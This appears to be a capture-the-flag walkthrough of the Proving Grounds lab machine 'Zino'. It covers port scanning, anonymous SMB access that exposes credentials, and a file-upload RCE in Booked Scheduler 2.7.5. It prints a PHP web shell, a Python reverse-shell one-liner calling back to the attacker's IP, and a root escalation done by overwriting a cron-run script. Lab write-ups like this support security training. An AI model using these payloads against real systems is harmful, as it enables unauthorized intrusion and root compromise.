Proving Grounds | Zino
SCANNING:
Host is up, received user-set (0.24s latency).
Scanned at 2021–08–06 23:49:40 EDT for 861s
Not shown: 65529 filtered ports
Reason: 65529 no-responses
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack vsftpd 3.0.3
22/tcp open ssh syn-ack OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 b2:66:75:50:1b:18:f5:e9:9f:db:2c:d4:e3:95:7a:44 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC44YysvRUv+02vB7LK+DbEvDnTUU2Zzaj42pbyX7gL4I5DhhWWZmK4Sr/MulEE2XPnKhXCCwTVuA12C/VuFhVdnq7WjDwfV+4a1DEuDG8P7wQAux0waAsly34mGtd7HQhQIv9h7nQWcTx8hoOrF6D71eHiZmLJ6fk01VlFN75XKJGn/T/ClJHz9UJ33zwkhqXskMO9At21LfOBE+I3IQCHuFFO6DcQWw/SsZaXQxHNzLqnI/9j1aQuvyuh6KMdT6p10D577maBz+T+Hyq/qeOgbGU0YGAoXXMU36FibkoQ+WwDRYbEHYKJccUXhzFWp980PYCIDtZNaWuo/AbgryLB
| 256 91:2d:26:f1:ba:af:d1:8b:69:8f:81:4a:32:af:9c:77 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOmcORNC6GjDnH1cqJrCeytZJjGrpJyY+CgseFsH27PJmSbmVYEz0ls0w/oXR0xrG/IfvxxyH9RRX2BIsBTx2cY=
| 256 ec:6f:df:8b:ce:19:13:8a:52:57:3e:72:a3:14:6f:40 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIP9wfKL6wusRXGDMv5Tcf2OxMAIkhvOofRPsrSQ+aMbK
139/tcp open netbios-ssn syn-ack Samba smbd 3.X — 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn syn-ack Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
3306/tcp open mysql? syn-ack
| fingerprint-strings:
| DNSVersionBindReqTCP, NULL:
|_ Host ‘192.168.49.152’ is not allowed to connect to this MariaDB server
| mysql-info:
|_ MySQL Error: Host ‘192.168.49.152’ is not allowed to connect to this MariaDB server
8003/tcp open http syn-ack Apache httpd 2.4.38
| http-ls: Volume /
| SIZE TIME FILENAME
| — 2019–02–05 21:02 booked/
|_
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Index of /
Using smbclient, we can list the shares on the target machine
Sharename Type Comment
— — — — — — — — — — -
zino Disk Logs
print$ Disk Printer Drivers
IPC$ IPC IPC Service (Samba 4.9.5-Debian)
We can login anonymously in the zino share
Downloading misc.log and viewing it’s contents, we are able to see credentials that we can use for the webapp running on port 8003
Exploitation:
Viewing the site on port 8003, we can immediately notice that the webapp name and version is mentioned on the bottom. Googling Booked Scheduler v2.7.5, we can view this step-by-step RCE exploit on github https://github.com/F-Masood/Booked-Scheduler-2.7.5---RCE-Without-MSF.
After authenticating as admin using the credentials we found, navigate to /booked/Web/admin/manage_theme.php and upload a php webshell in replacement of the custom favicon. We don't need to use null byte or file extension bypass.
You can use this web shell → <?php system($_GET[‘cmd’]);?>
OR
You can also upload a php reverse shell right off the bat. Just use a port that’s open on the target to circumvent firewall rules.
This time, we will make use of a web shell.
We can access our malicious php file → http://192.168.152.64:8003/booked/Web/custom-favicon.php
python -c ‘import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.49.152”,21));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(“/bin/sh”)’
We can use the python payload above to give us a reverse shell.
Privilege Escalation:
If we take a look at the system-wide cronjobs at /etc/crontab, we can see that the root user runs the python script /var/www/html/booked/cleanup.py every 3 minutes.
The python script cleans the /var/www/html/booked/uploads/reservastion directory of all files/folders recursively.
Checking our permissions on the script, we have write,run,and execute permissions on the file. We can levarage our write permissions on this script and the fact that root runs this script every 3 minutes.
We can edit the script locally, replace the cleanup.py script on the target. In my case, I’ve edited the script that will connect to our host machine on port 21; we will listen on port 21 and wait for the connection to be made.
We get our reverse shell after root executes the cronjob.
